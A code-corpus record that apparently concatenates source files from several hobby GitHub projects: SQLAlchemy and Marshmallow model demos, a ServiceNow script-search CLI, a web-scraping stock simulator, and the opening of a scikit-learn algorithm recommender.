class BookSchema(ma.ModelSchema):
class Meta:
model = Book
fields = ('id', 'title', 'author', 'tags')
author = ma.HyperlinkRelated("one_author")
tags = ma.List(ma.Nested(TagSchema))
links = ma.Hyperlinks({
'self': {
'href': ma.URLFor('book', id='<id>'),
'title': 'book_detail'
},
'collection': ma.URLFor('book'),
})
user_schema = UserSchema()
users_schema = UserSchema(many=True)
author_schema = AuthorSchema()
authors_schema = AuthorSchema(many=True)
book_schema = BookSchema()
books_schema = BookSchema(many=True)
tag_schema = TagSchema()
tags_schema = TagSchema(many=True)
# --------- Sum Seed data --------- #
author = Author.query.filter_by(name="Chuck Paluhniuk").one()
# author_schema = AuthorSchema()
book = Book(title="Fight Club", author=author)
# db.session.add(author)
db.session.add(book)
jrrt = Author.query.filter_by(name="J.R.R. Tolkien").one()
jrrt_books = [
Book(title="The Hobbit", author=jrrt),
Book(title="The Lord of the Rings", author=jrrt),
Book(title="The Silmarillion", author=jrrt),
]
db.session.add_all(jrrt_books)
db.session.commit()
tag = Tag(tag="fantasy")
lotr = db.session.query(Book).filter_by(author_id=2).all()
for book in lotr:
book.tags.append(tag)
lotr.tags.append(tag)
db.session.commit()
db.create_all()
|
[
"/api.py",
"/functions.py",
"/models.py"
] |
009Kings/squalchemy_testin
|
import sqlalchemy
from sqlalchemy import create_engine
from sqlalchemy.ext.declarative import declarative_base
from sqlalchemy.orm import relationship
from sqlalchemy import Column, String, Integer, Sequence, ForeignKey, Table
engine = create_engine('postgresql://localhost/sqlalchemy_pets', echo=True)
Base = declarative_base()
pet_toys = Table('pet_toys', Base.metadata,
Column('toy_id', ForeignKey('toys.id'), primary_key=True),
Column('pet_id', ForeignKey('pets.id'), primary_key=True)
)
class User(Base):
__tablename__= 'users'
id = Column(Integer, Sequence('user_id_seq'), primary_key=True)
name = Column(String, nullable=False)
email = Column(String, unique=True)
nickname = Column(String(50))
pets = relationship('Pet', back_populates='user', cascade='all, delete, delete-orphan')
def __repr__(self):
return f'🌝<User(id={self.id}, name={self.name}, email={self.email}, nickname={self.nickname})>'
class Pet(Base):
__tablename__ = 'pets'
id = Column(Integer, Sequence('pet_id_seq'), primary_key=True)
name = Column(String, nullable=False)
species = Column(String, nullable=False)
age = Column(Integer)
user_id = Column(Integer, ForeignKey('users.id', ondelete='CASCADE'))
user = relationship('User', back_populates='pets')
toys = relationship('Toy', secondary=pet_toys, back_populates='pets')
def __repr__(self):
return f'🦚<Pet(id={self.id}, name={self.name}, species={self.species}, age={self.age}, user_id={self.user_id})>'
class Toy(Base):
__tablename__ = 'toys'
id = Column(Integer, Sequence('toy_id_seq'), primary_key=True)
item = Column(String, nullable=False, unique=True)
pets = relationship('Pet', secondary=pet_toys, back_populates='toys')
def __repr__(self):
return f'🧳<Toy(id={self.id}, item={self.item})>'
# Migrates everything
Base.metadata.create_all(engine)
--- FILE SEPARATOR ---
import sqlalchemy
from sqlalchemy.orm import sessionmaker
from models import engine, User, Pet, Toy
Session = sessionmaker(bind=engine)
def user_crud():
session = Session()
# Create
tosspot = User(name='Gavin Callander',
email='gavin.callander@generalassemb.ly',
nickname='Gav')
session.add(tosspot)
session.add_all([
User(name='Wendy Williams', email='windywendy@gmail.com', nickname='WW'),
User(name='Steven Peters', email='stpets@bigdaddybezos.com', nickname='Stpets'),
User(name='Michael Schull', email='vashonbum@gmail.com', nickname='Mike'),
User(name='Madison Edmiston', email='madison.edmiston@ga.co', nickname='Mads')
])
# Read
go_to_gal = session.query(User).filter_by(nickname='Mads').first()
go_to_gal.email = 'madison.edmiston@generalassemb.ly'
# DESTROY
session.delete(tosspot)
session.query(User).filter_by(nickname="WW").delete()
session.commit()
def pet_crud():
session = Session()
go_to_gal = session.query(User).filter_by(nickname='Mads').first()
go_to_gal.pets = [Pet(name='Emmy', species='dog', age=2)]
# emmy = session.query(Pet).filter_by(name='Emmy').first()
go_to_gal.pets += [Pet(name='Blub', species='fish')]
# print(go_to_gal.pets)
# session.delete(go_to_gal)
# print(session.query(Pet).filter_by(name='Emmy').count())
session.commit()
def toy_crud():
session = Session()
a_user = session.query(User).first()
print(a_user)
emmy = session.query(Pet).filter_by(name='Emmy').first()
emmy.toys = [Toy(item='ball')]
emmy.toys.append(Toy(item='squeeky duck'))
print(emmy.toys)
session.commit()
def user_query(id):
session = Session()
user = session.query(User).filter_by(id=id).first()
print("🥼")
print(user)
if __name__ == '__main__':
user_query(25)
|
[
"/models.py",
"/server.py"
] |
00Duck/DetectiveSparky
|
import getpass
import click
import sqlite3
import keyring
from pathlib import Path
import os
def startup_profile():
import sys
try:
# parent.parent is only needed here since this file is in cmd_funcs
wd = Path(__file__).parent.parent.resolve()
conn = sqlite3.connect(os.path.join(wd, 'sparky.db'))
except:
try:
wd = Path(__file__).parent.parent.resolve()
os.system("sqlite3 " + os.path.join(wd, 'sparky.db'))
conn = sqlite3.connect(os.path.join(wd, 'sparky.db'))
except:
click.secho("Failed to load sparky database.", fg="red")
sys.exit()
try:
cur = conn.cursor()
cur.execute('''CREATE TABLE IF NOT EXISTS profile (
profile_name text,
url text,
user text,
selected int
);''')
conn.commit()
except:
click.secho("Error connecting to profile. Please check the sparky database or recreate if you are having issues.", fg="red")
sys.exit()
finally:
conn.close()
def new_profile():
click.echo("\nEnter a profile name")
pn = input(click.style(">> ", fg="bright_white", bold=True))
click.echo("Enter a URL")
url = input(click.style(">> ", fg="bright_white", bold=True))
click.echo("Enter an admin user name")
user = input(click.style(">> ", fg="bright_white", bold=True))
click.echo("Enter the user's password")
pw = getpass.getpass(prompt=click.style(">> ", fg="bright_white", bold=True), stream=None)
if pn == "" or url == "" or user == "" or pw == "":
click.echo("Missing input - profile not created.")
return
try:
wd = Path(__file__).parent.parent.resolve()
conn = sqlite3.connect(os.path.join(wd, 'sparky.db'))
cur = conn.cursor()
cur.execute('''insert into profile values (?, ?, ?, ?)''', (pn, url, user, 0))
conn.commit()
if cur.lastrowid != 0:
click.echo("Profile " + pn + " created.")
keyring.set_password("sparky - " + str(cur.lastrowid) + " - " + pn, user, pw)
except Exception as e:
click.secho("Error creating profile " + pn + ": " + str(e), fg="red")
finally:
conn.close()
def list_profiles():
try:
click.echo()
wd = Path(__file__).parent.parent.resolve()
conn = sqlite3.connect(os.path.join(wd, 'sparky.db'))
cur = conn.cursor()
profs = cur.execute('''SELECT rowid, profile_name, user, selected, url FROM profile''').fetchall()
if profs == []:
click.echo("You have no profiles. Type 'sparky profile new' to create a new one.\n")
else:
click.secho("{:<15} {:<20} {:<30} {:<10} {:<30}".format('Row ID', 'Profile Name', 'User', 'Selected', 'URL'), fg="bright_white", bold=True)
for i in profs:
click.echo("{:<15} {:<20} {:<30} {:<10} {:<30}".format(i[0], i[1], i[2], '' if i[3] == 0 else 'True', i[4]))
except Exception as e:
click.secho("Error listing profiles: " + str(e), fg="red")
finally:
conn.close()
return profs
def delete_profile():
profiles = list_profiles()
if len(profiles) > 0:
click.echo("\nEnter the Row ID to delete")
rowid = input(click.style(">> ", fg="bright_white", bold=True))
else:
return
try:
int(rowid) # throw ValueError if we didn't get an integer
except ValueError:
click.secho("Invalid input.", fg="red")
return
try:
wd = Path(__file__).parent.parent.resolve()
conn = sqlite3.connect(os.path.join(wd, 'sparky.db'))
cur = conn.cursor()
sel_resp = cur.execute("""SELECT profile_name, user FROM profile WHERE rowid = ?;""", (rowid,)).fetchone()
if sel_resp != None:
try:
keyring.delete_password("sparky - " + rowid + " - " + sel_resp[0], sel_resp[1])
except Exception as e:
click.secho("Could not delete password in keychain: " + str(e), fg="red")
del_resp = cur.execute("""DELETE FROM profile WHERE rowid = ?;""", (rowid,))
conn.commit()
if del_resp.rowcount == 0:
click.echo("Could not find row " + str(rowid) + " to delete")
else:
click.echo("Profile deleted.")
except Exception as e:
click.secho("Error deleting profile with rowid " + rowid + ": " + str(e), fg="red")
finally:
conn.close()
def edit_profile():
profiles = list_profiles()
if len(profiles) > 0:
click.echo("\nEnter the Row ID to edit")
rowid = input(click.style(">> ", fg="bright_white", bold=True))
else:
return
try:
int(rowid) # throw ValueError if we didn't get an integer
except ValueError:
click.secho("Invalid input.", fg="red")
return
try:
wd = Path(__file__).parent.parent.resolve()
conn = sqlite3.connect(os.path.join(wd, 'sparky.db'))
cur = conn.cursor()
sel_resp = cur.execute("""SELECT profile_name, url, user, selected FROM profile WHERE rowid = ?;""", (rowid,)).fetchone()
if sel_resp == None:
click.secho("No profile found with Row ID " + rowid, fg="red")
return
profile_name = sel_resp[0]
url = sel_resp[1]
user = sel_resp[2]
selected = sel_resp[3]
try:
pw = keyring.get_password("sparky - " + rowid + " - " + profile_name, user)
except:
pw = ""
click.echo("Input new Profile Name (or press ENTER to skip)")
edit_profile_name = input(click.style("(" + profile_name + ") >> ", fg="bright_white", bold=True)) or profile_name
click.echo("Input new URL (or press ENTER to skip)")
edit_url = input(click.style("(" + url + ") >> ", fg="bright_white", bold=True)) or url
click.echo("Input new User (or press ENTER to skip)")
edit_user = input(click.style("(" + user + ") >> ", fg="bright_white", bold=True)) or user
click.echo("Input new Password (or press ENTER to skip)")
edit_password = getpass.getpass(prompt=click.style(">> ", fg="bright_white", bold=True), stream=None) or pw
try:
keyring.delete_password("sparky - " + rowid + " - " + profile_name, user)
except:
pass
try:
keyring.set_password("sparky - " + rowid + " - " + edit_profile_name, edit_user, edit_password)
except:
pass
cur.execute("""UPDATE profile SET profile_name = ?, url = ?, user = ?, selected = ? WHERE rowid = ?;""", (edit_profile_name, edit_url, edit_user, selected, rowid) )
conn.commit()
except Exception as e:
click.secho("Error editing profile with rowid " + rowid + ": " + str(e), fg="red")
finally:
conn.close()
def select_profile():
profiles = list_profiles()
if len(profiles) > 0:
click.echo("\nEnter the Row ID to select")
rowid = input(click.style(">> ", fg="bright_white", bold=True))
else:
return
try:
int(rowid) # throw ValueError if we didn't get an integer
except ValueError:
click.secho("Invalid input.", fg="red")
return
try:
wd = Path(__file__).parent.parent.resolve()
conn = sqlite3.connect(os.path.join(wd, 'sparky.db'))
cur = conn.cursor()
sel_resp = cur.execute("""UPDATE profile SET selected = 1 WHERE rowid = ?;""", (rowid,))
if sel_resp.rowcount == 0:
click.echo("Could not find row " + str(rowid) + " to select")
else:
cur.execute("""UPDATE profile SET selected = 0 WHERE rowid != ?;""", (rowid,))
conn.commit()
click.echo("Profile selected.")
except Exception as e:
click.secho("Error selecting profile with rowid " + str(rowid) + ": " + str(e), fg="red")
finally:
conn.close()
--- FILE SEPARATOR ---
from typing import List, Tuple
import click
import os, sys
import requests
from urllib.parse import quote
from ..connection.conn import setup_connection
def get_full_query_list(s: requests.Session, url: str, query_type: str) -> List[Tuple[str, str]]:
"""Queries for the entire list of tables with the corresponding """
sd_query = "internal_type=script_plain^ORinternal_type=script_server^ORinternal_type=script^active=true"
if query_type == "xml":
sd_query = "internal_type=xml^active=true"
elif query_type == "html":
sd_query = "internal_type=html^ORinternal_type=html_script^ORinternal_type=html_template^active=true"
# on sys_dictionary, name is the table name and element is the field name
resp = s.get(url + "/api/now/table/sys_dictionary", params={"sysparm_fields": "name,element", "sysparm_query": sd_query})
if resp.status_code != 200:
click.secho("Received status code " + str(resp.status_code) + " while retrieving list of " + query_type + " tables to query. Aborting.", fg="red")
sys.exit()
resp_json = resp.json()
ret = []
if resp_json['result'] != None:
for i in resp_json['result']:
ret.append((i['name'], i['element']))
return ret
def get_list_from_file(filename: str) -> List[Tuple[str, str]]:
ret = []
try:
with open(filename, 'r') as file:
for line in file.readlines():
line_arr = line.split(',')
if len(line_arr) != 2:
click.secho("File " + filename + " is not formatted correctly. Aborting query.", fg="red")
sys.exit()
table = str(line_arr[0]).strip()
field = str(line_arr[1]).strip()
if table == "" or field == "":
click.secho("File " + filename + " is not formatted correctly. Aborting query.", fg="red")
sys.exit()
ret.append( (str(line_arr[0]), str(line_arr[1])) )
except Exception as e:
click.secho("Could not open " + filename + ": " + str(e), fg="red")
sys.exit()
return ret
def generic_lookup(s: requests.Session, url: str, query_list: List[Tuple[str, str]], query_string: str):
click.echo("[ Found " + click.style(str(len(query_list)), fg="blue") + " entries to scan ]")
click.echo(click.style("{:<35} {:<25} {:<25} {:<50}".format('Sys ID', 'Table', 'Field', 'Name'), fg="bright_white", bold=True) )
for item in query_list:
table = str(item[0]).strip()
field = str(item[1]).strip()
resp = s.get(url + "/api/now/table/" + table, params={"sysparm_fields":"sys_id,name,u_name,sys_name", "sysparm_query": field + "LIKE" + quote(query_string)})
if resp.status_code == 401 or resp.status_code == 500 or resp.status_code == 429:
click.secho("Received status code " + str(resp.status_code) + " while retrieving data for table: " + table + ", field: " + field + ". Aborting.", fg="red")
sys.exit()
elif resp.status_code == 403: # sometimes we don't have access to query a table. Let's just skip these.
continue
try:
resp_json = resp.json()
if resp_json.get('result') != None:
for i in resp_json['result']:
click.echo("{:<35} {:<25} {:<25} {:<50}".format(i.get('sys_id'), table, field, str(i.get('name') or i.get('sys_name') or i.get('u_name')).strip() ))
elif resp.json.get('error') != None:
click.secho("Error while querying: " + str(resp_json['error']), fg="yellow")
except: # This could hit if the user fat-fingered a custom query list.
if resp_json.get('error') != None:
click.secho("Error while querying: " + str(resp_json['error']), fg="yellow")
click.secho("Finished.", fg="bright_white", bold=True)
def run_query(query_type: str, filename: str):
click.echo("Input query string for lookup")
query_string = input(click.style(">> ", fg="bright_white", bold=True))
s, url = setup_connection()
if filename == None:
query_list = get_full_query_list(s, url, query_type)
else:
query_list = get_list_from_file(filename)
generic_lookup(s, url, query_list, query_string)
def wf_script_lookup(s: requests.Session, url: str, query_list: List[Tuple[str, str, str]], query_string: str):
click.echo("[ Found " + click.style(str(len(query_list)), fg="blue") + " entries to scan ]")
click.echo(click.style("{:<35} {:<35} {:<35} {:<50}".format('WF Activity Sys ID', 'WF Version Sys ID', 'Sys Variable Value Sys ID', 'WF Activity Name'), fg="bright_white", bold=True) )
for item in query_list:
wf_act_sys_id = str(item[0]).strip()
wf_activity_name = str(item[1]).strip()
wf_version_sys_id = str(item[2]).strip()
query = "document=wf_activity^document_key={}^variable.internal_type=script^ORvariable.internal_type=script_plain^valueLIKE{}".format(
wf_act_sys_id,
query_string.strip()
)
resp = s.get(url + "/api/now/table/sys_variable_value", params={"sysparm_fields":"sys_id", "sysparm_query": query})
if resp.status_code == 401 or resp.status_code == 500 or resp.status_code == 429:
click.secho("Received status code " + str(resp.status_code) + " while retrieving data for wf_activity: " + wf_act_sys_id + ", name: " + wf_activity_name + ". Aborting.", fg="red")
sys.exit()
elif resp.status_code == 403: # This should never happen...
click.secho("403 while querying sys_variable_value", fg="yellow")
continue
try:
resp_json = resp.json()
if resp_json.get('result') != None:
for i in resp_json['result']:
click.echo("{:<35} {:<35} {:<35} {:<50}".format( wf_act_sys_id, wf_version_sys_id, i.get('sys_id'), wf_activity_name ))
elif resp.json.get('error') != None:
click.secho("Error while querying: " + str(resp_json['error']), fg="yellow")
except: # This should also never happen, but just in case!
if resp_json.get('error') != None:
click.secho("Error while querying: " + str(resp_json['error']), fg="yellow")
click.secho("Finished.", fg="bright_white", bold=True)
def wf_activity_lookup(s: requests.Session, url: str, wf_name: str) -> List[Tuple[str, str, str]]:
"""Grabs a list of all published wf_activity records that match the given workflow. This will build our initial list of activities to
query against, to be limited again by sys_variable_value's that reference a script variable."""
query = "workflow_version.published=true^workflow_version.name=" + wf_name
resp = s.get(url + "/api/now/table/wf_activity", params={"sysparm_fields": "sys_id,name,workflow_version", "sysparm_query": query})
if resp.status_code != 200:
click.secho("Received status code " + str(resp.status_code) + " while retrieving list of wf_activity records to query. Aborting.", fg="red")
sys.exit()
resp_json = resp.json()
ret = []
if resp_json.get('result') != None:
for i in resp_json['result']:
ret.append( (i.get('sys_id'), i.get('name'), i.get('workflow_version').get('value')) )
elif resp.json.get('error') != None:
click.secho("Error while querying: " + str(resp_json['error']), fg="yellow")
return ret
def query_workflow():
click.echo("Enter name of workflow to search")
wf_name = input(click.style(">> ", fg="bright_white", bold=True)).strip()
click.echo("Enter script fragment to search")
query_string = input(click.style(">> ", fg="bright_white", bold=True)).strip()
s, url = setup_connection()
query_list = wf_activity_lookup(s, url, wf_name)
wf_script_lookup(s, url, query_list, query_string)
--- FILE SEPARATOR ---
import click
from ..connection import conn
import sys
import re
def text_search():
click.echo("Enter the table name and sys_id of a record to search")
table_name = input(click.style("Table name >> ", fg="bright_white", bold=True)).strip()
sys_id = input(click.style("sys_id >> ", fg="bright_white", bold=True)).strip()
fragment = input(click.style("Search string >> ", fg="bright_white", bold=True)).strip()
if table_name == "" or sys_id == "":
click.secho("You must enter both a sys_id and table name to search", fg="red")
sys.exit()
if len(sys_id) != 32:
click.secho("Invalid sys_id", fg="red")
sys.exit()
s, url = conn.setup_connection()
resp = s.get(url + "/api/now/table/" + table_name, params={"sysparm_query": "sys_id=" + sys_id})
body = resp.json()
if resp.status_code != 200:
try:
err = body.get('error').get('message')
click.secho("Search failed with status " + str(resp.status_code) + ' - ' + err, fg="red")
except:
click.secho("Search failed with status " + str(resp.status_code), fg="red")
finally:
sys.exit()
res = body.get('result')
if len(res) == 0:
click.secho("No results found.", fg="bright_white", bold=True)
sys.exit()
obj = res[0] # at this point, we have a full record in the form of a dict
found_results = False
for prop in obj:
search_results = search(fragment, obj[prop])
if len(search_results) > 0:
click.secho("\nIn column " + click.style(prop, fg="yellow") + ":")
print_results(search_results)
found_results = True
if not found_results:
click.secho("No results found", fg="yellow")
"""Takes a string value with multiple newlines and searches it against a fragment.
Returns a list of found results with the term
"""
def search(fragment, value):
value = str(value)
ret = []
lines = value.split("\r\n")
for inx, item in enumerate(lines):
term = re.search(fragment, item)
if term != None:
#Search term found, line count, full line
ret.append((term.group(), inx + 1, item))
return ret
"""Color prints the list of search results for each field"""
def print_results(results):
for item in results:
line_num = str(item[1])
line_found = color(str(item[2]).strip(), str(item[0]), "blue")
click.secho(click.style("\tLine " + line_num + ": ", fg="bright_white", bold=True) + line_found)
"""Colors input word found in given line by CLI color"""
def color(line: str, word: str, color: str):
color_text = click.style(word, fg=color, bold=True)
return line.replace(word, color_text)
--- FILE SEPARATOR ---
import keyring
import sqlite3
import click
from pathlib import Path
from typing import Tuple
import requests
import os, sys
def setup_connection() -> Tuple[requests.Session, str]:
"""Constructs the session using our profile and performs checks to ensure querying will go smoothly."""
try:
wd = Path(__file__).parent.parent.resolve()
conn = sqlite3.connect(os.path.join(wd, 'sparky.db'))
cur = conn.cursor()
# Make sure we have a profile
sel_resp = cur.execute("""SELECT rowid, profile_name, user, url FROM profile WHERE selected = 1;""").fetchone()
if sel_resp == None:
click.secho("No profile currently selected. Please use 'sparky profile select' to select a profile before querying.", fg="red")
sys.exit()
except Exception as e:
click.secho("Error selecting profile during connection setup. Aborting with error: " + str(e), fg="red")
sys.exit()
finally:
conn.close()
# Make sure we can get the password
pw = keyring.get_password("sparky - " + str(sel_resp[0]) + " - " + sel_resp[1], sel_resp[2])
if pw == None:
click.secho("Could not find a password for the selected profile. Please try removing and adding the selected profile again.", fg="red")
sys.exit()
# clean up URL
url = str(sel_resp[3]).strip().replace("http://", "https://")
if url.find("https://") == -1:
url = "https://" + url
# Remove trailing slashes before appending the rest of the URL (common if copied from a browser)
if url[-1] == '/':
url = url[:-1]
if not url.endswith("service-now.com"):
url += ".service-now.com"
click.echo("Profile " + click.style(sel_resp[1], fg="green") + " is selected. (" + url + ")")
# Do pre-flight check for access to instance and ability to query admin tables
s = requests.Session()
s.auth = (str(sel_resp[2]), pw)
resp = s.get(url + '/api/now/table/sys_dictionary', params = {'sysparm_fields': 'sys_id', 'sysparm_limit': '1'}, headers={'Content-Type': 'application/json'})
if resp.status_code == 401:
click.secho("User credentials for the selected profile failed to authentcate.", fg="red")
sys.exit()
elif resp.status_code == 403:
click.secho("The profile selected is not authorized to query admin tables. Please ensure your ServiceNow user has admin access.", fg="red")
sys.exit()
elif resp.status_code >= 200 and resp.status_code <= 299:
return s, url
else:
click.secho("Abnormal status code for instance (" + str(resp.status_code) + "), aborting.", fg="red")
sys.exit()
--- FILE SEPARATOR ---
import click
CONTEXT_SETTINGS = dict(help_option_names=["-h", "--help"])
@click.group(
help="A tool to help find code in any ServiceNow instance.",
context_settings=CONTEXT_SETTINGS,
)
def cli() -> None:
from .cmd_funcs.profile import startup_profile
startup_profile()
@cli.command("version", help="Shows the current version.")
def version_cmd() -> None:
click.echo("{} {}\n\n{}".format(
click.style("DetectiveSparky", fg="green"),
click.style("v1.1.0", fg="bright_white", bold=True),
click.style("Written by Blake Duckworth", fg="blue", dim=True)
)
)
### PROFILE COMMANDS
@click.group("profile", help="Contains commands for managing SNow profiles. Use the command 'sparky profile --help' for additional options.")
def profile_cmd() -> None:
pass
@profile_cmd.command("new", help="Adds a new profile to your list of available selections. When adding a profile, please make sure that the associated account contains credentials with admin access so that script/html/xml fields can be searched against.")
def profile_add():
from .cmd_funcs.profile import new_profile
new_profile();
@profile_cmd.command("list", help="Displays a list of existing profiles that have been added to sparky.")
def profile_list():
from .cmd_funcs.profile import list_profiles
list_profiles()
@profile_cmd.command("delete", help="Removes an existing profile.")
def profile_del():
from .cmd_funcs.profile import delete_profile
delete_profile()
@profile_cmd.command("select", help="Selects the primary profile to be used for all future queries.")
def profile_select():
from .cmd_funcs.profile import select_profile
select_profile()
@profile_cmd.command("edit", help="Edits an existing profile.")
def profile_edit():
from .cmd_funcs.profile import edit_profile
edit_profile()
### QUERY COMMANDS
@cli.group("query", help="All commands for querying using the selected profile. Use the command 'sparky query -h' for additional options. Please note that these commands will not work if you have not both created and selected a profile.")
def query_cmd() -> None:
pass
@query_cmd.command("script", help="Queries against script fields using the selected profile.")
@click.option(
"--filename",
"-f",
help=(
"Instead of performing the default search against all script records, specify a file by path "
"that lists the tables and corresponding field names to perform the query against."
"\n\nExample file format: sys_script_include,script"
),
type=str,
default=None,
required=False,
)
def query_script(filename: str):
from .cmd_funcs.query import run_query
run_query("script", filename)
@query_cmd.command("html", help="Queries against HTML fields using the selected profile.")
@click.option(
"-f",
"--filename",
help=(
"Instead of performing the default search against all HTML records, specify a file by path "
"that lists the tables and corresponding field names to perform the query against."
"\n\nExample file format: sp_widget,template"
),
type=str,
default=None,
required=False,
)
def query_html(filename: str):
from .cmd_funcs.query import run_query
run_query("html", filename)
@query_cmd.command("xml", help="Queries against XML fields using the selected profile.")
@click.option(
"-f",
"--filename",
help=(
"Instead of performing the default search against all XML records, specify a file by path "
"that lists the tables and corresponding field names to perform the query against."
"\n\nExample file format: sys_ui_page,html"
),
type=str,
default=None,
required=False,
)
def query_xml(filename: str):
from .cmd_funcs.query import run_query
run_query("xml", filename)
@query_cmd.command("workflow", help="Performs queries against scripts in workflows.")
def query_wf():
from .cmd_funcs.query import query_workflow
query_workflow()
### TEXT SEARCH
@cli.command("textsearch", help="Text searches a single record in ServiceNow. Shows all case-sensitive matching instances.")
def txt_cmd() -> None:
from .cmd_funcs.single_search import text_search
text_search()
cli.add_command(version_cmd)
cli.add_command(profile_cmd)
cli.add_command(query_cmd)
cli.add_command(txt_cmd)
|
[
"/src/sparky/cmd_funcs/profile.py",
"/src/sparky/cmd_funcs/query.py",
"/src/sparky/cmd_funcs/single_search.py",
"/src/sparky/connection/conn.py",
"/src/sparky/main.py"
] |
00MB/stock-simulation
|
line = "\n" + "_" * 50 + "\n"
#globals = {"start" : start, "quit" : quit, "help" : help, "about" : about}
--- FILE SEPARATOR ---
#Python stock market simulator
from globals import *
from bs4 import BeautifulSoup
import requests
def set():
global portfolio
global funds
fileread = open("data.txt", "r")
funds = fileread.readline()
funds = float(funds.strip())
portfolio = fileread.readline().strip().split(",")
if portfolio != [""]:
for x in range(len(portfolio)):
portfolio[x] = portfolio[x].split("-")
portfolio[x][1] = float(portfolio[x][1])
portfolio[x][2] = int(portfolio[x][2])
fileread.close()
for x in range(len(portfolio)):
if portfolio[x] == "":
del portfolio[x]
set()
print(f"""\nThis is a real time investment simulation. \n
If you are new or want to reset the simulation, type !START. \n
To see a list of commands, type !COMMANDS {line}""")
#FUNCTIONS
def about():
print("""
This stock simulator is a weekend project created by github user 00MB
on 20/7/20. The simulator works by scraping live figures from yahoo finance, and saving
the user into a text file. Feel free to play around and break it.
""")
def buy():
global funds
global portfolio
symbol = input("Enter stock symbol: ")
url = "https://uk.finance.yahoo.com/quote/" + symbol
headers = {"User-Agent" : "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) snap Chromium/83.0.4103.61 Chrome/83.0.4103.61 Safari/537.36"}
request = requests.get(url, headers=headers)
soup = BeautifulSoup(request.content, 'html.parser')
try:
price = soup.find("span", class_="Trsdu(0.3s) Fw(b) Fz(36px) Mb(-4px) D(ib)").get_text()
price = float(price.replace(',',''))
except:
print("ERROR - invalid stock symbol")
return
print(f"Stock price: ${price}")
print(f"funds available: ${funds}")
try:
amount = int(input("Please insert stock amount (To cancel, insert 0): "))
except ValueError:
print("\nERROR - incorrect data type")
return
if amount < 0 or amount > 1000:
print("ERROR - unavailable amount")
return
elif amount == 0:
return
totalsum = amount * price
if totalsum > funds:
print("Costs exceeds available funds")
return
else:
portfolio.append([symbol,price,amount])
funds = round((funds - totalsum),2)
print("Successfully purchased stock")
def sell():
global funds
global portfolio
try:
symbol = input("Enter stock symbol to sell: ")
names = [x[0] for x in portfolio]
index = names.index(symbol)
print(f"index:{index}")
except:
print(f"ERROR - no {symbol} stock is owned")
return
print(f"Amount owned: {portfolio[index][2]}")
try:
amount = int(input("Input amount of stocks to sell: "))
except ValueError:
print("\nERROR - incorrect data type")
return
if amount > portfolio[index][2]:
print("ERROR - invalid input")
return
url = "https://uk.finance.yahoo.com/quote/" + symbol
headers = {"User-Agent" : "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) snap Chromium/83.0.4103.61 Chrome/83.0.4103.61 Safari/537.36"}
request = requests.get(url, headers=headers)
soup = BeautifulSoup(request.content, 'html.parser')
price = soup.find("span", class_="Trsdu(0.3s) Fw(b) Fz(36px) Mb(-4px) D(ib)").get_text()
price = float(price.replace(',',''))
print(f"Stock bought at: ${portfolio[index][1]}")
print(f"Current stock price: ${price}")
print(f"Profit/loss: ${amount * (float(price) - float(portfolio[index][1]))}\n")
sold = input(f"Would you like to sell {symbol} stock at ${price} (type Y or N): ")
if sold.lower() == "n":
print("Request cancelled")
return
elif sold.lower() == "y":
pass
else:
print("ERROR - invalid input")
return
amountnew = portfolio[index][2] - amount
funds = round((funds + (float(price) * amount)),2)
if amountnew == 0:
del portfolio[index]
else:
portfolio[index][2] = amountnew
print(f"Successfully sold {symbol} stock at ${price}, your funds available are ${funds}")
if funds < 0:
print("\nFunds available have reached less than 0, please type !START to reset")
def fund():
print(f"Current funds available: ${funds}")
def stocks():
print("Current stocks:")
for x in portfolio:
print(f"Symbol: {x[0]}, Bought at: ${x[1]}, Amount: {x[2]}")
def start():
global funds
global portfolio
try:
funds = float(input("Enter your starting amount: $"))
except ValueError:
print("\nERROR - incorrect data type")
return
print("\nSuccessfully set funds")
portfolio = []
def quit():
dup = portfolio
filewrite = open("data.txt", "w")
filewrite.write(str(funds)+"\n")
for x in range(len(dup)):
dup[x][1] = str(dup[x][1])
dup[x][2] = str(dup[x][2])
dup[x] = "-".join(dup[x])
dup = ",".join(dup)
filewrite.write(dup)
filewrite.close()
exit()
def save():
dup = portfolio
filewrite = open("data.txt", "w")
filewrite.write(str(funds))
filewrite.write("\n")
for x in range(len(dup)):
dup[x][1] = str(dup[x][1])
dup[x][2] = str(dup[x][2])
dup[x] = "-".join(dup[x])
dup = ",".join(dup)
filewrite.write(dup)
filewrite.close()
set()
def commands():
print("""
!ABOUT - displays information about the program and creator\n
!BUY - displays menu to buy stocks\n #
!FUND - displays the current funds available\n #
!PRICE {stock symbol} - displays live price of stock\n
!QUIT - stops the process and closes the application\n
!SAVE - saves current stocks and available funds\n
!SELL - displays menu to sell your current stocks\n #
!START - clears data and prompts user to enter starting funds amount\n #
!STOCKS - displays the currently owned stocks\n #
""")
globals = {'!BUY' : buy, '!START' : start, '!QUIT' : quit, '!COMMANDS' : commands, '!STOCKS' : stocks, '!FUND' : fund, '!SELL' : sell, '!SAVE' : save, '!ABOUT' : about}
while True:
inp = input("Enter command: ")
if inp in globals:
print("\n")
globals[inp]()
print(line)
else:
print("ERROR - invalid command")
|
[
"/globals.py",
"/stock.py"
] |
00Starlord00/Algo-Recomender
|
import random
import supervised
import unsupervised
def data_shuffle(dataSet): #Shuffle the dataSet.
with open(dataSet,"r") as f1, open("Shuffled_data.csv","w") as f2: #Shuffled dataset will be stored in the
lines = f1.readlines() #"Shuffled_data.csv" file.
cpy = str(lines[0])
random.shuffle(lines)
f2.write(cpy)
for line in lines:
if line != cpy:
f2.write(line)
def classifier(dataSet, shuffling = 0, yCol = -1):
if shuffling == 1:
data_shuffle(dataSet)
classifier("Shuffled_data.csv",0)
else:
print("Computing...")
algorithmName, highAccuracy, savedModel = supervised.classifier(dataSet,yCol)
return algorithmName, highAccuracy, savedModel
def cluster(dataSet, shuffing = 0, yCol = -1):
if shuffing == 1:
data_shuffle(dataSet)
cluster("Shuffled_data.csv", 0)
else:
print("Computing...")
algorithmName, highAccuracy, savedModel = unsupervised.cluster(dataset)
return algorithmName, highAccuracy, savedModel
if __name__ =='__main__':
classifier(dataSet,shuffing,yCol)
cluster(dataSet,shuffling,yCol)
--- FILE SEPARATOR ---
import sklearn as sk
import pandas as pd
import pickle
from sklearn.model_selection import train_test_split
from sklearn.linear_model import LogisticRegression
from sklearn.naive_bayes import GaussianNB
from sklearn.linear_model import SGDClassifier
from sklearn.neighbors import KNeighborsClassifier
from sklearn.tree import DecisionTreeClassifier
from sklearn.ensemble import RandomForestClassifier
from sklearn.svm import SVC
